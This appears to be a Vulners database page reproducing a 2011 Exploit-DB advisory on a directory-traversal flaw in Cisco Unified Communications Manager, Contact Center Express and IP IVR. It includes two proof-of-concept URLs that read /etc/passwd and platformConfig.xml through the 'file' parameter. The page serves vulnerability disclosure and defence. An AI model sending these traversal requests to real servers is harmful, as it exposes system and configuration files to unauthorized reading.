Lucene search

K

Cisco - 'file' Directory Traversal

🗓️ 26 Oct 2011 00:00:00Reported by Sandro GauciType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Cisco directory traversal vulnerability in multiple product

Show more
Code
source: https://www.securityfocus.com/bid/50372/info

Multiple Cisco products are prone to a directory-traversal vulnerability.

Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.

This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.

The following products are affected:

Cisco Unified IP Interactive Voice Response
Cisco Unified Contact Center Express
Cisco Unified Communications Manager 

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml 

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Oct 2011 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.851
23
.json
Report